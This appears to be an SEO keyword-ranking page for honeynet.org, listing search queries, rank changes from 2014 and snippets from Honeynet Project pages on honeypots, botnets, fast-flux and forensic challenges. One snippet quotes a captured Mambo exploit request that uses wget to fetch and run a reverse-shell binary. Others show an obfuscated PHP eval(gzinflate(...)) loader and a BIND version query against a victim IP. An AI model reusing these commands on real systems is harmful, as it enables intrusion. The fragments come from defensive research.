honeynet.org

Please wait for loading...




      (376):

    /
     1  ~ 2014 jul 19security workshop dubai2013 Honeynet Project Workshop 10-12 Feb 2013 | DubaiThe 2013 Honeynet Project Security Workshop brings together experts in the field of information security from around the world to share the latest advances and ...
     2  +1 2014 oct 01worm source codeScan 25 – Analyze the Source Code of a Worm - The Honeynet ProjectScan 25 for November 2002 deals with analyzing a source code of a worm . The details of this problem can be found here. We were given ten questions to try to ...
     2  ~ 2014 jul 31honeypots ip baseProjects | The Honeynet ProjectCapture-HPC is a high-interaction client honeypot framework. ... Last, it generates an IP - based geographical mapping of the attack sources and generates ...
     2  +1 2014 jul 23fast flux dnsHOW FAST - FLUX SERVICE NETWORKS WORK | The Honeynet The goal of fast - flux is for a fully qualified domain name (such as ... Time-To-Live (TTL) for any given particular DNS Resource Record (RR).
     3  ~ 2014 sep 29wireshark iptablesSniffing using iptables | The Honeynet ProjectIn contrast iptables can not only match data from packet, but it can get information from tcp/ip ... ( wireshark see packets which should be dropped by iptables ).
     3  ~ 2014 sep 14flux networkSINGLE- FLUX NETWORKS | The Honeynet ProjectIn Figure 1 below we demonstrate a single- flux network . We compare a normal web browser communicating directly with a typical website ...
     3  +15 2014 aug 17ddos with socks listUses of botnets | The Honeynet ProjectOften botnets are used for Distributed Denial-of-Service ( DDoS ) attacks.
     3  ~ 2014 jul 19web bot akh exampleSlides - 2014 Honeynet Project WorkshopThe bot encrypts files on the victim's computer and asks for a ransom to recover them.
     4  -1 2014 sep 19project honey potThe Honeynet Project : BlogsBifrozt - A high interaction honeypot solution for Linux based systems. ... and asked to write a blog post about my own project called Bifrozt; ...
     5  +7 2014 sep 19project honeypot
     5  ~ 2014 sep 10kippo town hallkippo SSH honeypot | The Honeynet ProjectSo I will be doing a workshop on setting up a basic kippo SSH ... London will be held on April 24th 2013 at Kensington and Chelsea Town Hall .
     6  ~ 2014 sep 26webvizWebViz | The Honeynet ProjectWebViz is a GL visualization project implemented by Oguz as part of GSoc 2011. It allows to easily visualize attack data on a world globe.
     6  -1 2014 sep 15honeydHoneyd | The Honeynet ProjectThis is a low-interaction honeypot used for capturing attacker activity, very flexible . Developed and maintained by Niels Provos of the Global ...
     7  -1 2014 sep 29shellcode detectionEfficient Bytecode Analysis - The Honeynet ProjectLinespeed Shellcode Detection . Georg Wicherski ... Anatomy of a Shellcode ... Can only detect the decoder and therefore tend to be either false positive or false  ...
     7  +5 2014 aug 04sumer of codeGoogle Summer of Code 2014 | The Honeynet ProjectAfter another great year of Google Summer of Code 2013 and another 14 successful student projects, The Honeynet Project and students world-wide were  ...
     8  +3 2014 sep 26how to exploit $ serverEXPLOIT SERVERS | The Honeynet ProjectEvery front-end page sends information about itself to the exploit server via the HTTP Referrer header, which is then recorded by the IcePack ...
     8  +3 2014 aug 15challenge of reverse engineeringForensic Challenge 8 - "Malware Reverse Engineering " | The Challenge 8 - Malware Reverse Engineering (provided by Angelo Dell'Aera and Guido Landi from the Sysenter Honeynet Project Chapter). Please submit your ...
     8  +16 2014 jul 30socks for ddosOften botnets are used for Distributed Denial-of-Service ( DDoS ) attacks. ... Some bots offer the possibility to open a SOCKS v4/v5 proxy - a ...
     8  -4 2014 jul 24honey pot spamSHIVA ( Spam Honeypot with Intelligent Virtual Analyzer) | The SHIVA ( Spam Honeypot with Intelligent Virtual Analyzer) is an open-source, high interaction spam honeypot developed in Python2.7 and is ...
     9  +1 2014 oct 05email floding botKnow your Enemy: Tracking Botnets - The Honeynet ProjectRecursive HTTP- flood means that the bots start from a given HTTP link and then ... Some bots also implement a special function to harvest email -addresses.
     9  -2 2014 oct 02reverse engineering malwareForensic Challenge 8 - " Malware Reverse Engineering " | The
     9  -5 2014 sep 22conficker scannerSimple Conficker Scanner v2 | The Honeynet ProjectToday we released version 2 of our Simple Conficker Scanner (SCSv2). It contains a new scanning method which allows for detection of ...
     9  -3 2014 aug 23psybnc reset passwordAn Introduction to psyBNC 2.3.1Both of these do the exact same basic thing as psybnc : hide your real host. ..... If you're an admin, you can change other ppl's passwords :/ password [user] :[pass]
     9  +9 2014 jul 26fast proxy networkHOW FAST -FLUX SERVICE NETWORKS WORK | The Honeynet The goal of fast -flux is for a fully qualified domain name (such as ... which is hidden by the front end fast -flux proxy network nodes, that actually ...
     10  +22 2014 aug 31what are botnetsBased on the data we captured, the possibilities to use botnets can be categorized as listed below. And since a botnet is nothing more then a ...
     11  -3 2014 aug 01inject php codeCode Injection | The Honeynet ProjectCode injection is one such attack, which exploits a web application's interface to the ... A simple example of a PHP code injection attack follows:.
     13  +13 2014 jul 31passive network monitor livecdHeX LiveCD to be 2.0-RC2 soon. | The Honeynet ProjectIt is a Network Security Monitoring (NSM) centric Live CD , built based on the principles of NSM, for analysts, by analysts. ... Besides, HeX LiveCD is the blueprint for HornyD. ... Know Your Enemy: Passive Fingerprinting.
     14  -9 2014 sep 28know your enemyPapers | The Honeynet ProjectKnow Your Enemy : Containing Conficker · Know Your Enemy Lite: Proxy Threats - Socks v666 · Know Your Enemy : Malicious Web Servers · Know Your Enemy : ...
     14  +21 2014 sep 08open proxyOpen Proxy Honeypot - The Honeynet ProjectThe Honeypots: Monitoring and Forensics Project deployed an Apache web server that was configured as an Open Proxy . Your job is to analyze the log files and ...
     14  -1 2014 aug 06client-side attacks and defenseCLIENT - SIDE ATTACKS | The Honeynet ProjectIn order to understand client - side attacks , let us briefly describe ... clients to servers on the Internet is restricted via traditional defenses like ...
     15  -5 2014 aug 18cyber security malaysiaCyberSecurity Malaysia Chapter | The Honeynet ProjectCyberSecurity Malaysia is an agency under the Ministry of Science and Technology. The honeynet project is carried out by staff in the Malaysia Computer ...
     17  +12 2014 sep 19linux exploit top pstree findAttacker tools found on apollo.honeyp.edu Several of the trojaned files seem to be derived from the Linux Rootkit version 4.
     17  -11 2014 aug 22summer of code
     17  -6 2014 aug 17web application relatedKnow your Enemy: Web Application Threats - The Honeynet ProjectWith the constant growth of the Internet, more and more web applications are being .... integration with databases, and the high exposure of related web servers.
     18  +25 2014 aug 01twitter cuckoo systemProject 9 - Cuckoobox | The Honeynet ProjectCuckoo Sandbox is a dynamic malware analysis system able to trace ... Furthermore, certain traces left by Cuckoo and the Virtualization product ...
     18  -5 2014 jul 17web bot activity trackerWe then briefly analyze the three most common bot variants used. ... Clearly most of the activity on the ports listed above is caused by systems with ... from a given HTTP link and then follows all links on the provided website in a recursive way.
     19  +4 2014 aug 23scan for botnetsWith the help of honeynets we can observe the people who run botnets - a task ... With automated techniques they scan specific network ranges of the Internet ...
     19  -5 2014 jul 30wireshark network forensicsWireShnork - A Snort plugin for Wireshark | The Honeynet ProjectGSoC 2011 #8 project's goal was to add forensics features to the popular Wireshark network analyzer. Overview. Wireshark is an open source ...
     19  -7 2014 jul 16unrealircd privmsg delay200 concurrent threads should scan with a delay of 5 seconds for an unlimited time ... PRIVMSG #foobar :[TFTP]: File transfer started to IP: 200.124.175. ... Unreal IRCd (
     20  +12 2014 aug 04ideas for googleGoogle Summer of Code 2014 Project Ideas | The Honeynet ProjectThis page contains a list of potential project ideas that we are keen to develop during GSoC 2014 (we also have additional project ideas currently undergoing ...
     20  +29 2014 jul 22credit card advertising channelsKnow Your Enemy - A Profile - The Honeynet Projectcontributing to credit card fraud and identity ... were run on many of the intercepted channels to enable and ... advertising /negotiation activity is the principal.
     21  +9 2014 aug 31ids with pcapDigging through the PCAP for those last ones can be like looking for a needle ... message (snort.msg), Snort SID (Unique Signature ID ) like this:.
     21  -11 2014 jul 30virtual mail server spamIn short, the receiver part acts as an open relay SMTP server, collects all spam thrown at it and dumps them into a local directory. The analyzer ...
     22  +8 2014 sep 01paper book indexA series of white papers describing the concepts and technology of the Honeynet Project and Research Alliance and sharing lessons learned.
     22  +10 2014 aug 22google code projectsAfter another great year of Google Summer of Code 2013 and another 14 successful student projects , The Honeynet Project and students world-wide were  ...
     22  -12 2014 aug 06single php mamboAttacks against a single PHP honeypotThe following graph shows attacks against a PHP honeypot which are trying to exploit several distinct flaws. The vulnerabilities attacked are Mambo remote ...
     22  +1 2014 jul 30trace irc ipInternet Relay Chat ( IRC ) is a form of real-time communication over the Internet. ... In addition, the IP distribution of the bots makes ingress filter construction, ...
     22  +1 2014 jul 19copy network traffic#694 ( copy benign network traffic functionality not working correctly When the server is configured to copy network traffic on benign, but not on malicious classification the following happens: beign: pcap file is zipped up, but not ...
     23  ~ 2014 oct 02hpc host miamiAboutCapture – Capture- HPC - Honeynet Projectclients and the VMware servers that host the guest OS that run the Capture clients. ... Below, you will find several papers that have utilized Capture- HPC in one form ... in Computer Security Applications Conference, Miami Beach, 2007, pp.
     23  -7 2014 sep 17مقاله honey potKnow your Enemy: Web Application Threats | The Honeynet ProjectUsing Honeypots to learn about HTTP-based attacks ... Graphs of PHP Honeypot Attacks · Appendix E - Author Biographies · Reviewers.
     23  +16 2014 sep 06where is warsaw locatedCity Info - 2014 Honeynet Project Workshop - Warsaw PolandAbout Warsaw . Warsaw is a large city of about 1,600,000 people, with over 2,000,000 living in the Greater Warsaw area. It is located in central Poland on the  ...
     23  ~ 2014 sep 01malware analysis toolsThis page contains a list of tools and services that we use on a regular basis. ... bundels APKinspector as well as additional android malware analysis tools .
     23  +16 2014 aug 25digital forensics challengeThe Honeynet Project: The Forensic ChallengeThe Honeynet Project's Forensic Challenge was launched on January 15, 2001. ..... The digital time stamps and postmarks will be used to determine the 20 ...
     24  -11 2014 sep 13cpanel trojan scan alternativeWith automated techniques they scan specific network ranges of the Internet
     25  -12 2014 aug 28android decompiling voidIs Android malware served in theatres more sophisticated? | The Pietro wrote a nice post about him finding Android malware while ... I even use Emacs for browsing the decompiled code ;) For those who like to ...
     25  -3 2014 aug 27web application attacksThe number of attempted attacks every day for some of the large web hosting farms range ... Code injection is one such attack , which exploits a web application's  ...
     25  +6 2014 aug 19open proxy serversThe Honeypots: Monitoring and Forensics Project deployed an Apache web server that was configured as an Open Proxy . Your job is to analyze the log files and ...
     26  -3 2014 sep 10bind tell victimNXT-HowtoThe syntax looks like this: $dig @< victim_ip > version. bind chaos txt | grep \"8 ... first query our DNS server to tell us what is the primary DNS for infoseek.com.
     26  +3 2014 sep 08felix von leitnerSubmission by Felix von Leitnertimestamp · summary · advisory · analysis · the answers.
     26  -4 2014 aug 04microsoft-ds port numberAs broadband connections increase, so to do the number of potential victims of attacks. ... Port 445/TCP ( Microsoft - DS Service) is used for resource sharing on ...
     26  -4 2014 jul 16delay join unrealircdThe bot joins a specific IRC channel on an IRC server and waits there for further commands. ..... 200 concurrent threads should scan with a delay of 5 seconds for an ... Unreal IRCd (
     27  +10 2014 aug 07what is botnet
     28  -13 2014 sep 16reverse engineering malware toolsChallenge 8 - Malware Reverse Engineering (provided by Angelo Dell'Aera and ... Consider donating to support our forensic challenges, tools development, ...
     28  +15 2014 aug 30instant traffic locator spamInternet Relay Chat (IRC) is a form of real-time communication over the Internet.
     28  -23 2014 aug 23google summer of code
     28  ~ 2014 aug 19php gzinflate encodeScript Encodingeval( gzinflate (pack("H*",'dd3cdb56e3ca72cf9bb5ce[...]cd95ff04'))); The PHP functions pack(), and gzinflate () decode the PHP code that needs to run, which is  ...
     28  +27 2014 aug 01tracker google bootWe then briefly analyze the three most common bot variants used. Next we .... A similar abuse is also possible with Google's AdSense program: AdSense offers ...
     29  -7 2014 sep 27decompile cAnalysis of an unknown binary - The Honeynet ProjectThe second section details the analysis of the decompiled executable. It details what it is that ... This raises a question: why such an old version of the C library?
     29  -14 2014 sep 23honey d
     29  -1 2014 sep 02clamav to yara[cuckoo] Coded Support for YARA anyone interested?Previous message: [cuckoo] Coded Support for YARA anyone interested ... or CVE classifications - ClamAV signatures >> > converted to YARA  ...
     29  +12 2014 sep 01exploit javascript obfuscationOBFUSCATIONAlternatively, several efforts attempt to decrypt obfuscated JavaScript and ... to be applied to the front-end page that imports the page from the exploit server.
     29  +45 2014 aug 18web application vulnerabilitiesSome types of common PHP application vulnerabilities enable the attacker to include their own code in the targeted web application , a type of attack known as  ...
     29  +54 2014 aug 04dating bot messagesamplesWe start with an introduction to botnets and how they work, with examples of their uses.
     29  ~ 2014 jul 21slide uk varsawProgram - 2014 Honeynet Project Workshop - Warsaw Poland - The 12-14 May 2014 | Warsaw ... (The Honeynet Project), slides .... He leads the UK Honeynet Project Chapter and is the Honeynet Project's Google Summer of ...
     30  +30 2014 aug 24wernert l-bars machinesKnow Your Enemy: Containing Conficker - The Honeynet ProjectFelix Leder, Tillmann Werner ... The Conficker worm has infected several million computers since it first started spreading in late 2008 but ...
     30  +5 2014 aug 07google translate logoGoogle Translate | The Honeynet ProjectGoogle Translate . Thu, 08/07/2008 - 14:01 — drupal. Twitter logo ... Similar to the proxy server, the Google Translate service can act as a proxy as it translates ...
     31  +42 2014 sep 28fast attack interlinkHpfeedsHoneyGraph - Automated Attack Graph Construction for When given a hostname, Fast -Flux module resolves IP addresses and ... study the complexity of malicious websites through interlink analysis.
     31  +4 2014 aug 28packet capture bookWe present common behavior we captured, as well as statistics on the quantitative .... Bots can also use a packet sniffer to watch for interesting clear-text data ...
     32  +21 2014 aug 24kb gold sponsorLast chance to sponsor . | The Honeynet ProjectSponsorship is not limited to packages, but can also take the form of provision of ... HP- Sponsorship -Document_final.pdf, 340.9 KB .
     32  -13 2014 aug 10spam your enemyKnow your Enemy : Phishing | The Honeynet ProjectLast Modified: 16th May 2005. Phishing is the practice of sending out fake emails, or spam , written to appear as if they have been sent by banks ...
     33  +8 2014 sep 26cbackMambo exploit - The Honeynet Project&amp;cmd=cd%20/tmp;wget%20216.99.b.b/ cback ;chmod%20744%20cback; ./ cback %20217.160.c.c%208081;wget%20216.99.b.b/dc.txt... The GET request is  ...
     33  +8 2014 aug 31usb qemu-kvm syntaxeHow to convert to -device & friends = === Specifying Bus and Note: the USB device address can't be controlled at this time. .... QEMU uses LEGACY-CHARDEV syntax not just to set up guest devices, but ... QEMU supports assigning host PCI devices ( qemu - kvm only at this time) and host USB devices.
     33  +24 2014 aug 23google code project
     33  ~ 2014 jul 19ddos with fake proxy
     34  +67 2014 aug 12reverse engineering toolAndroid Reverse Engineering (A.R.E.) Virtual Machine available for Do you need to analyze a piece of Android malware, but dont have all your analysis tools at hand? The Android Reverse Engineering (A.R.E.) ...
     34  -16 2014 aug 02real time visualizationHoneyMap - Visualizing Worldwide Attacks in Real - Time | The The HoneyMap shows a real - time visualization of attacks against the Honeynet Project's sensors deployed around the world. It leverages the ...
    1 2 of 4 pages